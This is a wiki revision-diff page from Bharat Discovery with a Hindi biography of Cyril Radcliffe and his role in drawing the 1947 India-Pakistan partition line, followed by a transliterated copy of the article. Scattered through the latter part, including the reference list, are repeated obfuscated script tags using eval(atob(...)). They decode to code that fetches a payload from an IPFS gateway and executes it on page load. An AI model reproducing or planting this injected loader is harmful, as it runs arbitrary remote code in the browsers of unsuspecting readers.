Difference between revisions of "सीरिल रैडक्लिफ़"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''सीरिल रैडक्लिफ़''' (अंग्रेज़ी: ''Cyril Radcliffe'', जन्म: [[30 मार्...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
'''सीरिल रैडक्लिफ़''' ([[अंग्रेज़ी]]: ''Cyril Radcliffe'', जन्म: [[30 मार्च]], [[1899]] – मृत्यु: [[1 अप्रॅल]], [[1977]]) एक ब्रिटिश वकील थे जिन्होंने [[भारत]]-[[पाकिस्तान]] विभाजन की रेखा तैयार की थी। जिसे वर्तमान में [[रैडक्लिफ़ रेखा]] कहा जाता है।
+
[[चित्र:Cyril-Radcliffe.jpg|thumb|250px|सीरिल रैडक्लिफ़]]
 +
'''सीरिल रैडक्लिफ़''' ([[अंग्रेज़ी]]: ''Cyril Radcliffe'', जन्म: [[30 मार्च]], [[1899]] – मृत्यु: [[1 अप्रॅल]], [[1977]]) एक ब्रिटिश वकील थे, जिन्होंने [[भारत]]-[[पाकिस्तान]] विभाजन की रेखा तैयार की थी, जिसे वर्तमान में [[रैडक्लिफ़ रेखा]] कहा जाता है।
 
==इतिहास==
 
==इतिहास==
 
भारतीय उप-महाद्वीप का विभाजन और दो नए राज्यों/राष्ट्रों का निर्माण सन [[14 अगस्त]], [[1947]] को [[पाकिस्तान]] (मुस्लिम राष्ट्र) एवं सन [[15 अगस्त]], [[1947]] को [[भारत]] (रिपब्लिक ऑफ़ इंडिया) में करने की घोषणा [[लॉर्ड माउन्टबेटन]] ने की। इस विभाजन में न केवल भारतीय उप-महाद्वीप के दो टुकड़े किये गये बल्कि [[अखण्डित बंगाल|बंगाल]] का भी विभाजन किया गया और बंगाल के पूर्वी हिस्से को [[भारत]] से अलग कर पूर्वी पाकिस्तान (वर्तमान [[बांग्लादेश]]) बना दिया गया। वहीं [[अखण्डित पंजाब|पंजाब]] का विभाजन कर पाकिस्तान का निर्माण हुआ। इस विभाजन में रेलवे, फ़ौज, ऐतिहासिक धरोहर, केंद्रीय राजस्व, सबका बराबरी से बंटवारा किया गया। भारतीय महाद्वीप के इस विभाजन में जिन मुख्य लोगों ने हिस्सा लिया वो थे [[मोहम्मद अली जिन्ना]], [[लॉर्ड माउन्ट बेटन]], सीरिल रैडक्लिफ़, [[जवाहरलाल नेहरू]], [[महात्मा गाँधी]] एवं दोनों संगठनों ([[भारतीय राष्ट्रीय कांग्रेस]] एवं [[मुस्लिम लीग]]) के कुछ मुख्य कार्यकर्तागण। इन सब में सबसे अहम् व्यक्ति थे सीरिल रैडक्लिफ़ (''Cyril Radcliffe'') जिन्हें ब्रिटिश हुकूमत ने भारत-पाकिस्तान के विभाजन रेखा की जिम्मेदारी सौंपी थी।<ref>{{cite web |url=http://www.bharatdiscovery.org/india/%E0%A4%AD%E0%A4%BE%E0%A4%B0%E0%A4%A4_%E0%A4%95%E0%A4%BE_%E0%A4%B5%E0%A4%BF%E0%A4%AD%E0%A4%BE%E0%A4%9C%E0%A4%A8 |title=भारत का विभाजन |accessmonthday=6 जुलाई |accessyear=2014 |last= |first= |authorlink= |format= |publisher=भारतकोश |language=हिंदी }} </ref>
 
भारतीय उप-महाद्वीप का विभाजन और दो नए राज्यों/राष्ट्रों का निर्माण सन [[14 अगस्त]], [[1947]] को [[पाकिस्तान]] (मुस्लिम राष्ट्र) एवं सन [[15 अगस्त]], [[1947]] को [[भारत]] (रिपब्लिक ऑफ़ इंडिया) में करने की घोषणा [[लॉर्ड माउन्टबेटन]] ने की। इस विभाजन में न केवल भारतीय उप-महाद्वीप के दो टुकड़े किये गये बल्कि [[अखण्डित बंगाल|बंगाल]] का भी विभाजन किया गया और बंगाल के पूर्वी हिस्से को [[भारत]] से अलग कर पूर्वी पाकिस्तान (वर्तमान [[बांग्लादेश]]) बना दिया गया। वहीं [[अखण्डित पंजाब|पंजाब]] का विभाजन कर पाकिस्तान का निर्माण हुआ। इस विभाजन में रेलवे, फ़ौज, ऐतिहासिक धरोहर, केंद्रीय राजस्व, सबका बराबरी से बंटवारा किया गया। भारतीय महाद्वीप के इस विभाजन में जिन मुख्य लोगों ने हिस्सा लिया वो थे [[मोहम्मद अली जिन्ना]], [[लॉर्ड माउन्ट बेटन]], सीरिल रैडक्लिफ़, [[जवाहरलाल नेहरू]], [[महात्मा गाँधी]] एवं दोनों संगठनों ([[भारतीय राष्ट्रीय कांग्रेस]] एवं [[मुस्लिम लीग]]) के कुछ मुख्य कार्यकर्तागण। इन सब में सबसे अहम् व्यक्ति थे सीरिल रैडक्लिफ़ (''Cyril Radcliffe'') जिन्हें ब्रिटिश हुकूमत ने भारत-पाकिस्तान के विभाजन रेखा की जिम्मेदारी सौंपी थी।<ref>{{cite web |url=http://www.bharatdiscovery.org/india/%E0%A4%AD%E0%A4%BE%E0%A4%B0%E0%A4%A4_%E0%A4%95%E0%A4%BE_%E0%A4%B5%E0%A4%BF%E0%A4%AD%E0%A4%BE%E0%A4%9C%E0%A4%A8 |title=भारत का विभाजन |accessmonthday=6 जुलाई |accessyear=2014 |last= |first= |authorlink= |format= |publisher=भारतकोश |language=हिंदी }} </ref>
 +
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{भारत का विभाजन}}{{औपनिवेशिक काल}}
 
{{भारत का विभाजन}}{{औपनिवेशिक काल}}
[[Category:औपनिवेशिक काल]]
+
[[Category:औपनिवेशिक काल]][[Category:इतिहास कोश]][[Category:चरित कोश]]
[[Category:इतिहास कोश]][[Category:चरित कोश]]
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 09:04, 9 February 2017

thumb|250px|siril raidaklif siril raidaklif (aangrezi: Cyril Radcliffe, janm: 30 march, 1899 – mrityu: 1 aprॅl, 1977) ek british vakil the, jinhoanne bharat-pakistan vibhajan ki rekha taiyar ki thi, jise vartaman mean raidaklif rekha kaha jata hai.

itihas

bharatiy up-mahadvip ka vibhajan aur do ne rajyoan/rashtroan ka nirman san 14 agast, 1947 ko pakistan (muslim rashtr) evan san 15 agast, 1947 ko bharat (ripablik aauf iandiya) mean karane ki ghoshana l aaurd mauntabetan ne ki. is vibhajan mean n keval bharatiy up-mahadvip ke do tuk de kiye gaye balki bangal ka bhi vibhajan kiya gaya aur bangal ke poorvi hisse ko bharat se alag kar poorvi pakistan (vartaman baangladesh) bana diya gaya. vahian panjab ka vibhajan kar pakistan ka nirman hua. is vibhajan mean relave, fauj, aitihasik dharohar, keandriy rajasv, sabaka barabari se bantavara kiya gaya. bharatiy mahadvip ke is vibhajan mean jin mukhy logoan ne hissa liya vo the mohammad ali jinna, l aaurd maunt betan, siril raidaklif, javaharalal neharoo, mahatma gaandhi evan donoan sangathanoan (bharatiy rashtriy kaangres evan muslim lig) ke kuchh mukhy karyakartagan. in sab mean sabase ahamh vyakti the siril raidaklif (Cyril Radcliffe) jinhean british hukoomat ne bharat-pakistan ke vibhajan rekha ki jimmedari sauanpi thi.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. bharat ka vibhajan (hiandi) bharatakosh. abhigaman tithi: 6 julaee, 2014.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>